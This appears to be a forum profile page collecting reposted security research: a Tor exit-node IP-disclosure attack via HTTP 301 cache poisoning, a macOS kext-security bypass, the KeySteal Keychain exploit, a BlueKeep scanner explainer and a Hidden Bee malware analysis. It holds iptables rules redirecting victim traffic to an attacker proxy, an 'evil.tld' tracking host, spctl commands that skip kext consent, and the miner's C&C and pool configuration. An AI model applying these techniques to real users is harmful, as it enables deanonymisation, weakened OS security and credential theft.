-
Posts
18794 -
Joined
-
Last visited
-
Days Won
742
Everything posted by Nytro
-
Disclosing Tor users' real IP address through 301 HTTP Redirect Cache Poisoning Written on May 29, 2019 This blog post describes a practical application of the ‘HTTP 301 Cache Poisoning” attack that can be used by a malicious Tor exit node to disclose real IP address of chosen clients. PoC Video Client: Chrome Canary (76.0.3796.0) Client real IP address: 5.60.164.177 Client tracking parameter: 6b48c94a-cf58-452c-bc50-96bace981b27 Tor exit node IP address: 51.38.150.126 Transparent Reverse Proxy: tor.modlishka.io (Modlishka - updated code to be released.) Note: In this scenario Chrome was configured, through SOCKS5 settings, to use the Tor network. Tor circuit was set to a particular Tor test exit node: ‘51.38.150.126’. This is also a proof-of-concept and many things can be further optimized… On the malicious Tor exit node all of the traffic is being redirect to Modlishka proxy: iptables -A OUTPUT -p tcp -m tcp --dport 80 -j DNAT --to-destination ip_address:80 iptables -A FORWARD -j ACCEPT https://vimeo.com/339586722 Example Attack Scenario Description Assumptions: Browser-based application (in this case a standard browser) that will connect through the Tor network and, finally, through a malicious Tor exit node. Malicious Tor exit node that is intercepting and HTTP 301 cache poisoning all of the non-tls HTTP traffic. Lets consider the following attack scenario steps: User connects to the Internet through the Tor network either by setting up browsers’ settings to use the Tor SOCKS5 or system wide, where the whole OS traffic is being routed through the TOR network. User begins his typical browsing session with his favorite browser, where usually a lot of non-TLS HTTP traffic is being sent through the Tor tunnel. Evil Tor exit node intercepts those non-TLS requests and responds with a HTTP 301 permanent redirect to each of them. These redirects will be cached permanently by the browser and will point to a tracking URL with an assigned TOR client identifier. The tracking URL can be created in the following way: http://user-identifier.evil.tld. Where ‘evil.tld’ will collect all source IP information and redirect clients to the originally requested hosts … or, as an alternative, to a transparent reverse proxy that will try to intercept all of the clients subsequent HTTP traffic flow. Furthermore, since it is also possible to carry out an automated cache pollution for the most popular domains (as described in the previous post), e.g. TOP Alexa 100 , an attacker can maximize his chances of disclosing the real IP address. User, after closing the Tor session, will switch back to his usual network. As soon user types into the URL address bar one of the previously poisoned entries, e.g. “google.com,” browser will use the cache and internally redirect to the tracking URL with an exit-node context identifier. Exit node will now be able to correlate previously intercepted HTTP request and users’ real IP address through the information gathered on the external host that used tracking URL with user identifier. The evil.tld host will have information about all of the IP addresses that were used to access that tracking URL. Obviously, this gives a possibility to effectively correlate chosen HTTP requests with the client IP address by the Tor exit node. This is because the previously generated tracking URL will be requested by the client through the Tor tunell and later, after connecting through a standard ISP connection, again. This is because of the poisoned cache entries. Another approach, might rely on injecting modified JavaScript with embeded tracking URLS into the relevant non-TLS responses and setting up the right Cache control headers (e.g. to ‘Cache-Control: max-age=31536000’). However, this approach wouldn’t be very effective. Tracking users through standard cookies, by different web applications is also possible, but it’s not easy to force the client to visit the same, attacker-controlled, domain twice: once while it’s connecting through the Tor exit node and later after it switched back to the standard ISP connection. Conclusions The fact that it is possible to achieve certain persistency in browsers cache, by injecting poisoned entries, can be abused by an attacker to disclose real IP address of the Tor users that send non-TLS HTTP traffic through malicious exit nodes. Furthermore, poisoning a significant number of popular domain names will increase the likelihood of recieving a callback HTTP request (with assigned user identifier), that will allow to disclose users real IP. An attempt can be also made to ‘domain hook’ some of the browser-based clients and hope that a mistyped domain name will not be noticed by the user or will not be displayed (e.g. mobile application WebViews). Possible mitigation: When connecting through the Tor network ensure that all non-TLS traffic is disabled. Example browser plugins that can be used: “Firefox”, “Chrome”. Additionally, always use browser ‘private’ mode for browsing through Tor. Do not route all of your OS traffic through Tor without ensuring that there TLS traffic only… Use latest version of the Tor browser whenever possible for browsing web pages. References https://blog.duszynski.eu/domain-hijack-through-http-301-cache-poisoning/ - “HTTP 301 Cache Poisoning Attack” https://www.torproject.org/download/ - “Tor Browser” Sursa: https://blog.duszynski.eu/tor-ip-disclosure-through-http-301-cache-poisoning/
-
How to bypass Mojave 10.14.5’s new kext security I fear with the onset of notarization, this scenario is going to become increasingly common: you’ve just tried to install software which you understand includes at least one kernel extension, and has worked fine before macOS 10.14.5 (which you’re running). The install fails for no apparent reason. What do you do next? The probable cause is that one or more of the kernel extensions haven’t been notarized, and the security system in macOS has taken exception to that, refusing to install them. Of course there are a thousand and one other possible reasons, but here I’ll assume it’s the result of this change in security. Check first to ensure that you’re not overlooking the normal security dialog, which invites you to open the Security & Privacy pane and agree to the extensions being installed there. The only piece of information that you require is the developer ID of those kernel extensions. The simplest way to obtain this now is to open the Installer package using Suspicious Package. There, locate one of the kernel extensions, open the contextual menu, and export that whole kext (the folder with the extension .kext) to your Downloads folder. To get the developer ID and check whether that extension has been notarized in one fell swoop, use the spctl command in the form spctl -a -vv -t install mykext.kext One easy way to do this is to type most of the command spctl -a -vv -t install then drag and drop the extension from your Downloads folder to the end of that line, where its path and name should appear, e.g. /Users/hoakley/Downloads/VBoxDrv.kext Then press Return, and you should see three lines of response: mykext.kext: accepted source=Developer ID origin=Developer ID Application: DeveloperName (NJ2ABCUVC1) If the extension is notarized already, they will instead look like mykext.kext: accepted source=Notarized Developer ID origin=Developer ID Application: DeveloperName (NJ2ABCUVC1) Make a note on paper or your iOS device of the developer ID provided in parentheses, as you’ll need those in a few moments. Close your apps down and restart your Mac in Recovery mode. There, open Terminal and type in the command /usr/sbin/spctl kext-consent add NJ2ABCUVC1 where the code at the end is exactly the same as the developer ID which you just obtained from spctl. Press Return, wait for the command prompt to appear again, then quit Terminal and restart in normal mode. Now when you try running the Installer package, you should find that its extensions install correctly, as you’ve bypassed the new kext security controls. Please let the developer know of your problems and this workaround: they need to get their kernel extensions notarized to spare other users of this same rigmarole. New spctl features and wrinkles The man page for spctl hasn’t been updated for over six years, but in 2017 it gained a set of actions to handle kernel extensions and your consent for them to be installed – what Apple terms User Approved or Secure Kernel Extension loading. You should be able to see these if you call spctl with the -h option. These kext-consent commands only work when you’re booted in Recovery mode: they should return errors if you’re running in regular mode. This appears to unblock kernel extensions which macOS won’t install because they don’t comply with the new rules on notarization, presumably by adding the kernel extension to the new whitelist which was installed as part of the macOS 10.14.5 update. Kernel extensions which are correctly notarized should result in the display of the consent dialog taking the user to Security & Privacy; those which aren’t and don’t appear in the whitelist are simply blocked and not installed now. To show whether the normal system for obtaining user consent to install extensions is enabled: spctl kext-consent status To enable the normal system for obtaining user consent: spctl kext-consent enable and disable to disable, of course. To list the developer IDs which are allowed to load extensions without user consent spctl kext-consent list To add a developer ID to the list of those allowed to load kernel extensions without user consent spctl kext-consent add [devID] as used above, and remove to remove that. It is strange that this control using kext-consent works at a developer ID level, thus applies to all kernel extensions from that developer, whereas notarization is specific to an individual release of a certain code bundle from that developer. Sursa: https://eclecticlight.co/2019/06/01/how-to-bypass-mojave-10-14-5s-new-kext-security/
-
KeySteal KeySteal is a macOS <= 10.13.3 Keychain exploit that allows you to access passwords inside the Keychain without a user prompt. KeySteal consists of two parts: KeySteal Daemon: This is a daemon that exploits securityd to get a session that is allowed to access the Keychain without a password prompt. KeySteal Client: This is a library that can be injected into Apps. It will automatically apply a patch that forces the Security Framework to use the session of our keysteal daemon. Building and Running Open the KeySteal Xcode Project Build the keystealDaemon and keystealClient Open the directory which contains the built daemon and client (right cick on keystealDaemon -> Open in Finder) Run dump-keychain.sh TODO Add a link to my talk about this vulnerability at Objective by the Sea License For most files, see LICENSE.txt. The following files were taken (or generated) from Security-58286.220.15 and are under the Apple Public Source License: handletypes.h ss_types.h ucsp_types.h ucsp.hpp ucspUser.cpp A copy of the Apple Public Source License can be found here. Sursa: https://github.com/LinusHenze/Keysteal
-
- 1
-
-
By its nature, networking code is both complex and security critical. Any data received from the network is potentially malicious and therefore needs to be handled extremely carefully. However, the multitude of different networking protocols, such as IP, IPv6, TCP, and UDP, inevitably make the networking code very complicated, thereby making it more difficult to ensure that the code is bug free. For example, many of the functions in Apple’s networking code are thousands of lines long, with a huge number of different control flow paths to handle all the possible flags and options. Over the course of 2018, I found and reported a number of RCE vulnerabilities in iOS and macOS, all related to mbuf processing in Apple’s XNU operating system kernel: CVE-2018-4249, -4259, -4286, -4287, -4288, -4291, -4407, -4460. The mbuf datatype is used by the networking code in XNU to store and process all incoming and outgoing network packets. In this talk I will explain some of the low level details of how network packets are structured, and how the mbuf datatype is used to process them in XNU. I will discuss some of the corner cases that were handled incorrectly in XNU, making the code vulnerable to remote attack. I will also talk about how I discovered each vulnerability using custom-written variant analysis with Semmle QL (http://github.com/Semmle/QL), a research technique that complements other bug-finding techniques such as fuzzing. To finish off, I will explain the C programming techniques that I used to implement PoC exploits for each of these vulnerabilities, with demonstrations of these exploits in action (crashing the kernel).
-
Friday, May 31, 2019 Avoiding the DoS: How BlueKeep Scanners Work Background RDP Channel Internals MS_T120 I/O Completion Packets MS_T120 Port Data Dispatch Patch Detection Vulnerable Host Behavior Patched Host Behavior CPU Architecture Differences Conclusion Background On May 21, @JaGoTu and I released a proof-of-concept for CVE-2019-0708. This vulnerability has been nicknamed "BlueKeep". Instead of causing code execution or a blue screen, our exploit was able to determine if the patch was installed. Now that there are public denial-of-service exploits, I am willing to give a quick overview of the luck that allows the scanner to avoid a blue screen and determine if the target is patched or not. RDP Channel Internals The RDP protocol has the ability to be extended through the use of static (and dynamic) virtual channels, relating back to the Citrix ICA protocol. The basic premise of the vulnerability is that there is the ability to bind a static channel named "MS_T120" (which is actually a non-alpha illegal name) outside of its normal bucket. This channel is normally only used internally by Microsoft components, and shouldn't receive arbitrary messages. There are dozens of components that make up RDP internals, including several user-mode DLLs hosted in a SVCHOST.EXE and an assortment of kernel-mode drivers. Sending messages on the MS_T120 channel enables an attacker to perform a use-after-free inside the TERMDD.SYS driver. That should be enough information to follow the rest of this post. More background information is available from ZDI. MS_T120 I/O Completion Packets After you perform the 200-step handshake required for the (non-NLA) RDP protocol, you can send messages to the individual channels you've requested to bind. The MS_T120 channel messages are managed in the user-mode component RDPWSX.DLL. This DLL spawns a thread which loops in the function rdpwsx!IoThreadFunc. The loop waits via I/O completion port for new messages from network traffic that gets funneled through the TERMDD.SYS driver. Note that most of these functions are inlined on Windows 7, but visible on Windows XP. For this reason I will use XP in screenshots for this analysis. MS_T120 Port Data Dispatch On a successful I/O completion packet, the data is sent to the rdpwsx!MCSPortData function. Here are the relevant parts: We see there are only two valid opcodes in the rdpwsx!MCSPortData dispatch: 0x0 - rdpwsx!HandleConnectProviderIndication 0x2 - rdpwsx!HandleDisconnectProviderIndication + rdpwsx!MCSChannelClose If the opcode is 0x2, the rdpwsx!HandleDisconnectProviderIndication function is called to perform some cleanup, and then the channel is closed with rdpwsx!MCSChannelClose. Since there are only two messages, there really isn't much to fuzz in order to cause the BSoD. In fact, almost any message dispatched with opcode 0x2, outside of what the RDP components are expecting, should cause this to happen. Patch Detection I said almost any message, because if you send the right sized packet, you will ensure that proper cleanup is performed: It's real simple: If you send a MS_T120 Disconnect Provider (0x2) message that is a valid size, you get proper clean up. There should not be risk of denial-of-service. The use-after-free leading to RCE and DoS only occurs if this function skips the cleanup because the message is the wrong size! Vulnerable Host Behavior On a VULNERABLE host, sending the 0x2 message of valid size causes the RDP server to cleanup and close the MS_T120 channel. The server then sends a MCS Disconnect Provider Ultimatum PDU packet, essentially telling the client to go away. And of course, with an invalid size, you RCE/BSoD. Patched Host Behavior However on a patched host, sending the MS_T120 channel message in the first place is a NOP... with the patch you can no longer bind this channel incorrectly and send messages to it. Therefore, you will not receive any disconnection notice. In our scanner PoC, we sleep for 5 seconds waiting for the MCS Disconnect Provider Ultimatum PDU, before reporting the host as patched. CPU Architecture Differences Another stroke of luck is the ability to mix and match the x86 and x64 versions of the 0x2 message. The 0x2 messages require different sizes between the two architectures, which one might think sending both at once should cause the denial-of-service. Simply, besides the sizes being different, the message opcode is in a different offset. So on the opposite architecture, with a 0'd out packet (besides the opcode), it will think you are trying to perform the Connect 0x0 message. The Connect 0x0 message requires a much larger message and other miscellaneous checks to pass before proceeding. The message for another architecture will just be ignored. This difference can possibly also be used in an RCE exploit to detect if the target is x86 or x64, if a universal payload is not used. Conclusion This is an interesting quirk that luckily allows system administrators to quickly detect which assets remain unpatched within their networks. I released a similar scanner for MS17-010 about a week after the patch, however it went largely unused until big-name worms such as WannaCry and NotPetya started to hit. Hopefully history won't repeat and people will use this tool before a crisis. Unfortunately, @ErrataRob used a fork of our original scanner to determine that almost 1 million hosts are confirmed vulnerable and exposed on the external Internet. It is my knowledge that the 360 Vulcan team released a (closed-source) scanner before @JaGoTu and I, which probably follows a similar methodology. Products such as Nessus have now incorporated plugins with this methodology. While this blog post discusses new details about RDP internals related the vulnerability, it does not contain useful information for producing an RCE exploit that is not already widely known. Posted by zerosum0x0 at 12:00:00 AM Sursa: https://zerosum0x0.blogspot.com/2019/05/avoiding-dos-how-bluekeep-scanners-work.html
-
Hidden Bee: Let’s go down the rabbit hole Posted: May 31, 2019 by hasherezade Last updated: June 1, 2019 Some time ago, we discussed the interesting malware, Hidden Bee. It is a Chinese miner, composed of userland components, as well as of a bootkit part. One of its unique features is a custom format used for some of the high-level elements (this format was featured in my recent presentation at SAS). Recently, we stumbled upon a new sample of Hidden Bee. As it turns out, its authors decided to redesign some elements, as well as the used formats. In this post, we will take a deep dive in the functionality of the loader and the included changes. Sample 831d0b55ebeb5e9ae19732e18041aa54 – shared by @James_inthe_box Overview The Hidden Bee runs silently—only increased processor usage can hint that the system is infected. More can be revealed with the help of tools inspecting the memory of running processes. Initially, the main sample installs itself as a Windows service: Hidden Bee service However, once the next component is downloaded, this service is removed. The payloads are injected into several applications, such as svchost.exe, msdtc.exe, dllhost.exe, and WmiPrvSE.exe. If we scan the system with hollows_hunter, we can see that there are some implants in the memory of those processes: Results of the scan by hollows_hunter Indeed, if we take a look inside each process’ memory (with the help of Process Hacker), we can see atypical executable elements: Hidden Bee implants are placed in RWX memory Some of them are lacking typical PE headers, for example: Executable in one of the multiple customized formats used by Hidden Bee But in addition to this, we can also find PE files implanted at unusual addresses in the memory: Manually-loaded PE files in the memory of WmiPrvSE.exe Those manually-loaded PE files turned out to be legitimate DLLs: OpenCL.dll and cudart32_80.dll(NVIDIA CUDA Runtime, Version 8.0.61 ). CUDA is a technology belonging to NVidia graphic cards. So, their presence suggests that the malware uses GPU in order to boost the mining performance. When we inspect the memory even closer, we see within the executable implants there are some strings referencing LUA components: Strings referencing LUA scripting language, used by Hidden Bee components Those strings are typical for the Hidden Bee miner, and they were also mentioned in the previous reports. We can also see the strings referencing the mining activity, i.e. the Cryptonight miner. List of modules: bin/i386/coredll.bin dispatcher.lua bin/i386/ocl_detect.bin bin/i386/cuda_detect.bin bin/amd64/coredll.bin bin/amd64/algo_cn_ocl.bin lib/amd64/cudart64_80.dll src/cryptonight.cl src/cryptonight_r.cl bin/i386/algo_cn_ocl.bin config.lua lib/i386/cudart32_80.dll src/CryptonightR.cu bin/i386/algo_cn.bin bin/amd64/precomp.bin bin/amd64/ocl_detect.bin bin/amd64/cuda_detect.bin lib/amd64/opencl.dll lib/i386/opencl.dll bin/amd64/algo_cn.bin bin/i386/precomp.bin And we can even retrieve the miner configuration: configuration.set("stratum.connect.timeout",20) configuration.set("stratum.login.timeout",60) configuration.set("stratum.keepalive.timeout",240) configuration.set("stratum.stream.timeout",360) configuration.set("stratum.keepalive",true) configuration.set("job.idle.count",30) configuration.set("stratum.lock.count",30) configuration.set("miner.protocol","stratum+ssl://r.twotouchauthentication.online:17555/") configuration.set("miner.username",configuration.uuid()) configuration.set("miner.password","x") configuration.set("miner.agent","MinGate/5.1") view rawconfig.lua hosted with by GitHub Inside Hidden Bee has a long chain of components that finally lead to loading of the miner. On the way, we will find a variety of customized formats: data packages, executables, and filesystems. The filesystems are going to be mounted in the memory of the malware, and additional plugins and configuration are retrieved from there. Hidden Bee communicates with the C&C to retrieve the modules—on the way also using its own TCP-based protocol. The first part of the loading process is described by the following diagram: Each of the .spk packages contains a custom ‘SPUTNIK’ filesystem, containing more executable modules. Starting the analysis from the loader, we will go down to the plugins, showing the inner workings of each element taking part in the loading process. The loader In contrast to most of the malware that we see nowadays, the loader is not packed by any crypter. According the header, it was compiled in November 2018. While in the former edition the modules in the custom formats were dropped as separate files, this time the next stage is unpacked from inside the loader. The loader is not obfuscated. Once we load it with typical tools (IDA), we can clearly see how the new format is loaded. The loading function Section .shared contains the configuration: Encrypted configuration. The last 16 bytes after the data block is the key. The configuration is decrypted with the help of XTEA algorithm. Decrypting the configuration The decrypted configuration must start from the magic WORD “pZ.” It contains the C&C and the name under which the service will be installed: Unscrambling the NE format The NE format was seen before, in former editions of Hidden Bee. It is just a scrambled version of the PE. By observing which fields have been misplaced, we can easily reconstruct the original PE. The loader, unpacking the next stage NE is one of the two similar formats being used by this malware. Another similar one starts from a DWORD 0x0EF1FAB9 and is used to further load components. Both of them have an analogical structure that comes from slightly modified PE format: Header: WORD magic; // 'NE' WORD pe_offset; WORD machine_id; The conversion back to PE format is trivial: It is enough to add the erased magic numbers: MZ and PE, and to move displaced fields to their original offsets. The tool that automatically does the mentioned conversion is available here. In the previous edition, the parts of Hidden Bee with analogical functionality were delivered in a different, more complex proprietary format than the one currently being analyzed. Second stage: a downloader (in NE format) As a result of the conversion, we get the following PE: (fddfd292eaf33a490224ebe5371d3275). This module is a downloader of the next stage. The interesting thing is that the subsystem of this module is set as a driver, however, it is not loaded like a typical driver. The custom loader loads it into a user space just like any typical userland component. The function at the module’s Entry Point is called with three parameters. The first is a path of the main module. Then, the parameters from the configuration are passed. Example: 0012FE9C 00601A34 UNICODE "\"C:\Users\tester\Desktop\new_bee.exe\"" 0012FEA0 00407104 UNICODE "NAPCUYWKOxywEgrO" 0012FEA4 00407004 UNICODE "118.41.45.124:9000" Calling the Entry Point of the manually-loaded NE module The execution of the module can take one of the two paths. The first one is meant for adding persistence: The module installs itself as a service. If the module detects that it is already running as a service, it takes the second path. In such a case, it proceeds to download the next module from the server. The next module is packed as as Cabinet file. The downloaded Cabinet file is being passed to the unpacking function It is first unpacked into a file named “core.sdb”. The unpacked module is in a customized format based on PE. This time, the format has a different signature: “NS” and it is different from the aforementioned “NE” format (detailed explanation will be given further). It is loaded by the proprietary loader. The loader enumerates all the executables in a directory: %Systemroot%\Microsoft.NET\ and selects the ones with the compatible bitness (in the analyzed case it was selecting 32bit PEs). Once it finds a suitable PE, it runs it and injects the payload there. The injected code is run by adding its entry point to APC queue. Hidden Bee component injecting the next stage (core.sdb) into a new process In case it failed to find the suitable executable in that directory, it performs the injection into dllhost.exe instead. Unscrambling the NS format As mentioned before, the core.sdb is in yet another format named NS. It is also a customized PE, however, this time the conversion is more complex than the NE format because more structures are customized. It looks like a next step in the evolution of the NE format. Header of the NS format We can see that the changes in the PE headers are bigger and more lossy—only minimalist information is maintained. Only few Data Directories are left. Also the sections table is shrunk: Each section header contains only four out of nine fields that are in the original PE. Additionally, the format allows to pass a runtime argument from the loader to the payload via header: The pointer is saved into an additional field (marked “Filled Data” on the picture). Not only is the PE header shrunk. Similar customization is done on the Import Table: Customized part of the NS format’s import table This custom format can also be converted back to the PE format with the help of a dedicated converter, available here. Third stage: core.sdb The core.sdb module converted to PE format is available here: a17645fac4bcb5253f36a654ea369bf9. The interesting part is that the external loader does not complete the full loading process of the module. It only copies the sections. But the rest of the module loading, such as applying relocations and filling imports, is done internally in the core.sdb. The loading function is just at the Entry Point of core.sdb The previous component was supposed to pass to the core.sdb an additional buffer with the data about the installed service: the name and the path. During its execution, core.sdb will look up this data. If found, it will delete the previously-created service, and the initial file that started the infection: Removing the initial service Getting rid of the previous persistence method suggests that it will be replaced by some different technique. Knowing previous editions of Hidden Bee, we can suspect that it may be a bootkit. After locking the mutex in a format Global\SC_{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, the module proceeds to download another component. But before it goes to download, first, a few things are checked. Checks done before download of the next module First of all, there is a defensive check if any of the known debuggers or sniffers are running. If so, the function quits. The blacklist Also, there is a check if the application can open a file ‘\??\NPF-{0179AC45-C226-48e3-A205-DCA79C824051}’. If all the checks pass, the function proceeds and queries the following URL, where GET variables contain the system fingerprint: sltp://bbs.favcom.space:1108/setup.bin?id=999&sid=0&sz=a7854b960e59efdaa670520bb9602f87&os=65542&ar=0 The hash (sz=) is an MD5 generated from VolumeIDs. Then follows the (os=) identifying version of the operating system, and the identifier of the architecture (ar=), where 0 means 32 bit, 1 means 64bit. The content downloaded from this URL (starting from a magic DWORD 0xFEEDFACE – 79e851622ac5298198c04034465017c0) contains the encrypted package (in !rbx format), and a shellcode that will be used to unpack it. The shellcode is loaded to the current process and then executed. The ‘FEEDFACE’ module contains the shellcode to be loaded The shellcode’s start function uses three parameters: pointer to the functions in the previous module (core sdb), pointer to the buffer with encrypted data, size of the encrypted data. The loader calling the shellcode Fourth stage: the shellcode decrypting !rbx The beginning of the loaded shellcode: The shellcode does not fill any imports by itself. Instead, it fully relies on the functions from core.sdb module, to which it passes the pointer. It makes use of the following function: malloc, mecpy, memfree, VirtualAlloc. Example: calling malloc via core.sdb Its role is to reveal another part. It comes in an encrypted package starting from a marker !rbx. The decryption function is called just at the beginning: Calling the decrypting function (at Entry Point of the shellcode) First, the function checks the !rbx marker and the checksum at the beginning of the encrypted buffer: Checking marker and then checksum It is decrypted with the help of RC4 algorithm, and then decompressed. After decryption, the markers at the beginning of the buffer are checked. The expected format must start from predefined magic DWORDs: 0xCAFEBABE,0, 0xBABECAFE: The !rbx package format The !rbx is also a custom format with a consistent structure. DWORD magic; // "!rbx" DWORD checksum; DWORD content_size; BYTE rc4_key[16]; DWORD out_size; BYTE content[]; The custom file system (BABECAFE) The full decrypted content has a consistent structure, reminiscent of a file system. According to the previous reports, earlier versions of Hidden Bee used to adapt the ROMS filesystem, adding few modifications. They called their customized version “Mixed ROM FS”. Now it seems that their customization process has progressed. Also the keywords suggesting ROMFS cannot be found. The headers starts from the markers in the form of three DWORDS: { 0xCAFEBABE, 0, 0xBABECAFE }. The layout of BABECAFE FS: We notice that it differs at many points from ROM FS, from which it evolved. The structure contains the following files: /bin/amd64/coredll.bin /bin/i386/coredll.bin /bin/i386/preload /bin/amd64/preload /pkg/sputnik.spk /installer/com_x86.dll (6177bc527853fe0f648efd17534dd28b) /installer/com_x64.dll /pkg/plugins.spk The files /pkg/sputnik.spk and /pkg/plugins.spk are both compressed packages in a custom !rsi format. Beginning of the !rsi package in the BABECAFE FS Each of the spk packages contain another custom filesystem, identified by the keyword SPUTNIK (possibly the extension ‘spk’ is derived from the SPUTNIK format). They will be unpacked during the next steps of the execution. Unpacked plugins.spk: 4c01273fb77550132c42737912cbeb36 Unpacked sputnik.spk: 36f3247dad5ec73ed49c83e04b120523. Selecting and running modules Some executables stored in the filesystem are in two version: 32 and 64 bit. Only the modules relevant to the current architecture are loaded. So, in the analyzed case, the loader chooses first: /bin/i386/preload (shellcode) and /bin/i386/coredll.bin (a module in NS custom format). The names are hardcoded in the loader within the loading shellcode: Searching the modules in the custom file system After the proper elements are fetched (preload and coredll.bin), they are copied together into a newly-allocated memory area. The coredll.bin is copied just after preload. Then, the preload module is called: Redirecting execution to preload The preload is position-independent, and its execution starts from the beginning of the page. Entering ‘preload’ The only role of this shellcode is to prepare and run the coredll.bin. So, it contains a custom loader for the NS format that allocates another memory area and loads the NS file there. Fifth stage: preload and coredll After loading coredll, preload redirects the execution there. coredll at its Entry Point The coredll patches a function inside the NTDLL— KiUserExceptionDispatcher—redirecting one of the inner calls to its own code: A patch inside KiUserExceptionDispatcher Depending on which process the coredll was injected into, it can take one of a few paths of execution. If it is running for the first time, it will try to inject itself again—this time into rundll32. For the purpose of the injection, it will again unpack the original !rbx package and use its original copy stored there. Entering the unpacking function Inside the unpacking function: checking the magic “!rbx” Then it will choose the modules depending on the bitness of the rundll32: It selects the pair of modules (preload/coredll.bin) appropriate for the architecture, either from the directory amd64 or from i386: If the injection failed, it makes another attempt, this time trying to inject into dllhost: Each time it uses the same, hardcoded parameter (/Processid: {...}) that is passed to the created process: The thread context of the target process is modified, and then the thread is resumed, running the injected content: Now, when we look inside the memory of rundll32, we can find the preload and coredll being mapped: Inside the injected part, the execution follows a similar path: preload loads the coredll and redirects to its Entry Point. But then, another path of execution is taken. The parameter passed to the coredll decides which round of execution it is. On the second round, another injection is made: this time to dllhost.exe. And finally, it proceeds to the final round, when other modules are unpacked from the BABECAFE filesystem. Parameter deciding which path to take The unpacking function first searches by name for two more modules: sputnik.spk and plugins.spk. They are both in the mysterious !rsi format, which reminds us of !rbx, but has a slightly different structure. Entering the function unpacking the first !rsi package: The function unpacking the !rsi format is structured similarly to the !rbx unpacking. It also starts from checking the keyword: Checking “!rsi” keyword As mentioned before, both !rsi packages are used to store filesystems marked with the keyword “SPUTNIK”. It is another custom filesystem invented by the Hidden Bee authors that contain additional modules. The “SPUTNIK” keyword is checked after the module is unpacked Unpacking the sputnik.spk resulted in getting the following SPUTNIK module: 455738924b7665e1c15e30cf73c9c377 It is worth noting that the unpacked filesystem has inside of it four executables: two pairs consisting of NS and PE, appropriately 32 and 64 bit. In the currently-analyzed setup, 32 bit versions are deployed. The NS module will be the next to be run. First, it is loaded by the current executable, and then the execution is redirected there. Interestingly, both !rsi modules are passed as arguments to the entry point of the new module. (They will be used later to retrieve more components.) Calling the newly-loaded NS executable Sixth stage: mpsi.dll (unpacked from SPUTNIK) Entering into the NS module starts another layer of the malware: Entry Point of the NS module: the !rsi modules, perpended with their size, are passed The analyzed module, converted to PE is available here: 537523ee256824e371d0bc16298b3849 This module is responsible for loading plugins. It will also create a named pipe through which it is will communicate with other modules. It sets up the commands that are going to be executed on demand. This is how the beginning of the main function looks: Like in previous cases, it starts from finishing to load itself (relocations and imports). Then, it patches the function in NTDLL. This is a common prolog in many HiddenBee modules. Then, we have another phase of loading elements from the supplied packages. The path that will be taken depends on the runtime arguments. If the function received both !rsi packages, it will start by parsing one of them, retrieving loading submodules. First, the SPUTNIK filesystem must be unpacked from the !rsi package: After being unpacked, it is mounted. The filesystems are mounted internally in the memory: A global structure is filled with pointers to appropriate elements of the filesystem. At the beginning, we can see the list of the plugins that are going to be loaded: cloudcompute.api, deepfreeze.api, and netscan.api. Those names are being appended to the root path of the modules. Each module is fetched from the mounted filesystem and loaded: Calling the function to load the plugin Consecutive modules are loaded one after another in the same executable memory area. After the module is loaded, its header is erased. It is a common technique used in order to make dumping of the payload from the memory more difficult. The cloudcompute.api is a plugin that will load the miner. More about the plugins will be explained in the next section of this post. Reading its code, we find out that the SPUTNIK modules are filesystems that can be mounted and dismounted on demand. This module will be communicating with others with the help of a named pipe. It will be receiving commands and executing appropriate handlers. Initialization of the commands’ parser: The function setting up the commands: For each name, a handler is registered. (This is probably the Lua dispatcher, first described here.) When plugins are run, we can see some additional child processes created by the process running the coredll (in the analyzed case it is inside rundll32): Also it triggers a firewall alert, which means the malware requested to open some ports (triggered by netscan.api plugin): We can see that it started listening on one TCP and one UDP port: The plugins As mentioned in the previous section, the SPUTNIK filesystem contains three plugins: cloudcompute.api, deepfreeze.api, and netscan.api. If we convert them to PE, we can see that all of them import an unknown DLL: mpsi.dll. When we see the filled import table, we find out that the addresses have been filled redirecting to the functions from the previous NS module: So we can conclude that the previous element is the mpsi.dll. Although its export table has been destroyed, the functions are fetched by the custom loader and filled in the import tables of the loaded plugins. First the cloudcompute.api is run. This plugin retrieves from the filesystem a file named “/etc/ccmain.json” that contains the list of URLs: Those are addresses from which another set of modules is going to be downloaded: ["sstp://news.onetouchauthentication.online:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.club:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.icu:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.xyz:443/mlf_plug.zip.sig"] It also retrieves another component from the SPUTNIK filesystem: /bin/i386/ccmain.bin. This time, it is an executable in NE format (version converted to PE is available here: 367db629beedf528adaa021bdb7c12de) This is the component that is injected into msdtc.exe. The HiddenBee module mapped into msdtc.exe The configuration is also copied into the remote process and is used to retrieve an additional package from the C&C: This is the plugin responsible for downloading and deploying the Mellifera Miner: core component of the Hidden Bee. Next, the netscan.api loads module /bin/i386/kernelbase.bin (converted to PE: d7516ad354a3be2299759cd21e161a04) The miner in APT-style Hidden Bee is an eclectic malware. Although it is a commodity malware used for cryptocurrency mining, its design reminds us of espionage platforms used by APTs. Going through all its components is exhausting, but also fascinating. The authors are highly professional, not only as individuals but also as a team, because the design is consistent in all its complexity. Appendix https://github.com/hasherezade/hidden_bee_tools – helper tools for parsing and converting Hidden Bee custom formats https://www.bleepingcomputer.com/news/security/new-underminer-exploit-kit-discovered-pushing-bootkits-and-coinminers/ Articles about the previous version (in Chinese): https://www.freebuf.com/column/174581.html https://www.freebuf.com/column/175106.html Our first encounter with the Hidden Bee: https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/ Sursa: https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/
-
- 1
-
-
